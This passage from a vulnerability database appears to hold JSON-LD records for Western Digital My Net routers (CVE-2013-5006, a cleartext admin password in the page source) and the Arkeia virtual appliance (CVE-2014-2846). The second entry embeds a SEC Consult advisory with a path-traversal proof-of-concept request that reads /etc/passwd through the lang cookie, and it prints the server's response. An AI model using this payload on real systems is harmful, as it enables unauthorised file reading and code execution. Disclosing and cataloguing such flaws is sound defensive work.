},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201307-0443",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my net n900c",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": null
},
{
"model": "my net n750",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": null
},
{
"model": "my net n900",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": null
},
{
"model": "my net",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.03.12 (n600 and n750)"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.04.16 (n600 and n750)"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.05.12 (n900 and n900 central)"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.06.18 (n900 and n900 central)"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.06.28 (n900 and n900 central)"
},
{
"model": "my net n600",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my net n750",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my net n900",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my net n900 central",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "digital my net devices",
"scope": null,
"trust": 0.6,
"vendor": "western",
"version": null
},
{
"model": "my net",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.06.18"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.03.12"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.06.28"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.04.16"
},
{
"model": "my net",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.05.12"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_net_n900:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_net_n900c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_net_n750:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5006"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kyle Lovett",
"sources": [
{
"db": "BID",
"id": "61361"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
}
],
"trust": 0.9
},
"cve": "CVE-2013-5006",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-5006",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-10461",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-65008",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-5006",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2013-10461",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-666",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-65008",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "VULHUB",
"id": "VHN-65008"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "main_internet.php on the Western Digital My Net N600 and N750 with firmware 1.03.12 and 1.04.16, and the N900 and N900C with firmware 1.05.12, 1.06.18, and 1.06.28, allows remote attackers to discover the cleartext administrative password by reading the \"var pass=\" line within the HTML source code. Western Digital My Net is a series of router products from Western Digital, USA. \nAn information disclosure vulnerability exists in a number of Western Digital My Net devices that can expose administrator credentials. This vulnerability could be used by unauthorized attackers to gain sensitive information that can help launch further attacks. There is a security hole in the main_internet.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"db": "BID",
"id": "61361"
},
{
"db": "VULHUB",
"id": "VHN-65008"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65008",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65008"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5006",
"trust": 3.4
},
{
"db": "OSVDB",
"id": "95519",
"trust": 1.7
},
{
"db": "BID",
"id": "61361",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-10461",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "122640",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-80902",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "27288",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65008",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "VULHUB",
"id": "VHN-65008"
},
{
"db": "BID",
"id": "61361"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"id": "VAR-201307-0443",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "VULHUB",
"id": "VHN-65008"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
}
]
},
"last_update_date": "2023-12-18T14:06:15.667000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Downloads My Net N750",
"trust": 0.8,
"url": "http://support.wdc.com/product/download.asp?groupid=1702\u0026lang=en"
},
{
"title": "Downloads My Net N900",
"trust": 0.8,
"url": "http://support.wdc.com/product/download.asp?wdc_lang=en\u0026fid=wdsfmynetn900"
},
{
"title": "Downloads My Net N900 Central",
"trust": 0.8,
"url": "http://support.wdc.com/product/download.asp?groupid=1704\u0026lang=en"
},
{
"title": "Downloads My Net N600",
"trust": 0.8,
"url": "http://support.wdc.com/product/download.asp?groupid=1701\u0026lang=en"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65008"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-07/0133.html"
},
{
"trust": 2.5,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-07/0146.html"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/95519"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85903"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/61361"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5006"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5006"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "VULHUB",
"id": "VHN-65008"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"db": "VULHUB",
"id": "VHN-65008"
},
{
"db": "BID",
"id": "61361"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-07-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"date": "2013-07-31T00:00:00",
"db": "VULHUB",
"id": "VHN-65008"
},
{
"date": "2013-07-19T00:00:00",
"db": "BID",
"id": "61361"
},
{
"date": "2013-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"date": "2013-07-31T13:20:19.287000",
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"date": "2013-07-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"date": "2013-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-10461"
},
{
"date": "2020-02-24T00:00:00",
"db": "VULHUB",
"id": "VHN-65008"
},
{
"date": "2013-08-01T10:25:00",
"db": "BID",
"id": "61361"
},
{
"date": "2013-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003598"
},
{
"date": "2020-02-24T15:02:27.437000",
"db": "NVD",
"id": "CVE-2013-5006"
},
{
"date": "2013-07-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"date": "2020-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-666"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Western Digital My Net Vulnerability to break plaintext management password in router product firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003598"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-449"
}
],
"trust": 0.6
}
}
VAR-201404-0435
Vulnerability from variot - Updated: 2023-12-18 13:53Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin. Western Digital Arkeia Virtual Appliance is prone to a local file-include vulnerability. An attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible. Western Digital Arkeia Virtual Appliance 10.2.7 and prior versions are vulnerable. It supports data protection, deduplication, and direct backup of disks and tapes. SEC Consult Vulnerability Lab Security Advisory < 20140423-0 > ======================================================================= title: Path Traversal/Remote Code Execution product: WD Arkeia Virtual Appliance (AVA) vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. fixed version: 10.2.9 CVE number: CVE-2014-2846 impact: critical homepage: http://www.arkeia.com/ found: 2014-03-05 by: M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
Vendor description:
"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and affordable data protection for enterprises seeking to optimize the benefits of virtualization. The AVA offers all the features of the hardware appliance, but permits you to use your own choice of hardware."
source: http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance
Business recommendation:
The identified path traversal vulnerability can be exploited by unauthenticated remote attackers to gain unauthorized access to the WD Arkeia virtual appliance and stored backup data.
SEC Consult recommends to restrict access to the web interface of the WD Arkeia virtual appliance using a firewall until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the affected vendor. Path traversal enables attackers access to files and directories outside the web root through relative file paths in the user input.
An unauthenticated remote attacker can exploit the identified vulnerability in order to retrieve arbitrary files from the affected system and execute system commands.
Proof of concept:
The path traversal vulnerability exists in the /opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie is not properly checked before including a file using the PHP include() function. Example of the request that demonstrates the vulnerability by retrieving the contents of the /etc/passwd file:
POST /login/doLogin HTTP/1.0 Host: $host Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00 Content-Length: 25 Content-Type: application/x-www-form-urlencoded
password=bbb&username=aaa
The response from the affected application:
HTTP/1.1 200 OK Date: Wed, 05 Mar 2014 08:29:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Charset: UTF-8 Content-Length: 1217 Connection: close Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin {"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n ull]}}
Furthermore, the identified vulnerability can be also exploited to execute arbitrary PHP code/system commands by including files that contain specially crafted user input.
According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3 are affected.
Vendor contact timeline:
2014-03-13: Contacting vendor through support@arkeia.com 2014-03-14: Vendor confirms the vulnerability. 2014-03-17: Vendor provides a quick fix and a release schedule. 2014-04-21: Vendor releases a fixed version 2014-04-23: SEC Consult releases a coordinated security advisory.
Solution:
Update to the most recent version (10.2.9) of Arkeia Network Backup.
More information can be found at: http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
Workaround:
Advisory URL:
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult? Write to career@sec-consult.com
EOF M. Lucinskij / @2014
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0435",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "arkeia virtual appliance",
"scope": "lte",
"trust": 1.0,
"vendor": "westerndigital",
"version": "10.2.7"
},
{
"model": "arkeia virtual appliance",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "arkeia virtual appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "10.2.9"
},
{
"model": "arkeia virtual appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "10.2.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002293"
},
{
"db": "NVD",
"id": "CVE-2014-2846"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-558"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10.2.7",
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2846"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "M. Lucinskij",
"sources": [
{
"db": "BID",
"id": "67039"
},
{
"db": "PACKETSTORM",
"id": "126286"
}
],
"trust": 0.4
},
"cve": "CVE-2014-2846",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-2846",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-70785",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-2846",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-558",
